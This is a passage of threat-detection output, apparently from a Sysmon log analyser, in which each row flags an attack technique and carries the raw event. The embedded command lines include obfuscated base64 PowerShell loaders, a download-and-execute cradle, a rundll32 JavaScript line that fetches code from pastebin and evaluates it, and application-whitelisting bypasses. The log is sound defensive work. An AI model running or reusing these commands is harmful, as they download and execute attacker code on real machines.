([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))""") and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine ("C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 10675 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-14 12:17:14.661 + 747F3D96-FBCA-5D53-0000-001036784100 + 2876 + C:\Windows\System32\wscript.exe + 5.812.10240.16384 + Microsoft ® Windows Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + "c:\windows\system32\wscript.exe" /E:vbs c:\windows\temp\icon.ico "powershell -exec bypass -c ""IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))""" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-F419-5D53-0000-002026910200 + 0x29126 + 1 + Medium + SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C + 747F3D96-FBCA-5D53-0000-0010B8664100 + 2476 + C:\Windows\System32\rundll32.exe + "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.811477,2019-05-27T05:29:17.811477+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5901 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.771 + 365ABB72-3D6D-5CEB-0000-00100478FF00 + 3444 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969974.632117,2019-05-27T19:12:54.632117+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6190 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:54.515 + 365ABB72-FE76-5CEB-0000-001077710C00 + 2840 + C:\Windows\System32\wbem\WMIC.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + WMI Commandline Utility + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443 + 365ABB72-FE76-5CEB-0000-0010546E0C00 + 2356 + C:\Windows\System32\cmd.exe + cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (|, -c ,.Download,.DownloadFile(,Net.WebClient,powershell,.txt,|, -c ,.Download,.DownloadFile(,Net.WebClient,powershell,.txt) in event with Command Line (powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))") and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))") in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4912 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:23.380 + 747F3D96-6623-5D3F-0000-0010BC068800 + 3000 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-6623-5D3F-0000-001011F68700 + 5816 + C:\Windows\System32\cmd.exe + cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1202] Indirect Command Execution,1557680511.00795,2019-05-12T21:01:51.007950+04:00,,Threat,Medium,Found User (IEWIN7\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( "C:\Windows\System32\pcalua.exe" -a c:\Windows\system32\calc.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16497 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 17:01:50.781 + 365ABB72-517E-5CD8-0000-001024D61700 + 2952 + C:\Windows\System32\pcalua.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Program Compatibility Assistant + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\pcalua.exe" -a c:\Windows\system32\calc.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-4FB5-5CD8-0000-0020F2350100 + 0x135f2 + 1 + Medium + SHA1=ABB6319976D9702E0C80978D51C0AEE88A33D201,MD5=D652BA887500816431566B524292ECCB,SHA256=65446AF2997779DB6CDAEFB2ABC2994CA9F2A2477C882BC3A5F828BBFFB83CEE,IMPHASH=256CD8CEDFD4FCB3BC9DB32E27E5923A + 365ABB72-516B-5CD8-0000-001087E41600 + 3788 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4912 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:23.380 + 747F3D96-6623-5D3F-0000-0010BC068800 + 3000 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-6623-5D3F-0000-001011F68700 + 5816 + C:\Windows\System32\cmd.exe + cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564126781.211276,2019-07-26T11:39:41.211276+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:"\..\mshtml RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://pastebin.com/raw/y2CjnRtH",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im out.exe",0,true);} )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4353 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-26 07:39:14.853 + 747F3D96-AE22-5D3A-0000-001004D84E00 + 5548 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:"\..\mshtml RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://pastebin.com/raw/y2CjnRtH",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im out.exe",0,true);} + C:\Users\IEUser\Desktop\ + MSEDGEWIN10\IEUser + 747F3D96-ABD5-5D3A-0000-0020EB990F00 + 0xf99eb + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-AE22-5D3A-0000-001096B24E00 + 1504 + C:\Windows\hh.exe + "C:\Windows\hh.exe" C:\Users\IEUser\Desktop\Fax Record N104F.chm + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1074] Data Staged - Process,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4912 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:23.380 + 747F3D96-6623-5D3F-0000-0010BC068800 + 3000 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-6623-5D3F-0000-001011F68700 + 5816 + C:\Windows\System32\cmd.exe + cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16395 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:38:00.523 + 365ABB72-21B8-5CD8-0000-0010BADE2600 + 3856 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16395 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:38:00.523 + 365ABB72-21B8-5CD8-0000-0010BADE2600 + 3856 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16395 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:38:00.523 + 365ABB72-21B8-5CD8-0000-0010BADE2600 + 3856 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1553028075.144276,2019-03-20T00:41:15.144276+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966251 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:36:04.206 + 365ABB72-52B4-5C91-0000-0010355B0100 + 1628 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-528D-5C91-0000-0020E7030000 + 0x3e7 + 0 + System + MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-528D-5C91-0000-001062560000 + 484 + C:\Windows\System32\services.exe + C:\Windows\system32\services.exe + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe")",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 417079 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 11:43:36.303 + 747F3D96-D8E8-5F8A-0000-00102CEF7200 + 840 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" + C:\Users\IEUser\AppData\Roaming\ + MSEDGEWIN10\IEUser + 747F3D96-CA8D-5F8A-0000-0020D1090A00 + 0xa09d1 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-D8E5-5F8A-0000-0010E1BC7200 + 2920 + C:\Users\IEUser\AppData\Roaming\WINWORD.exe + C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart + 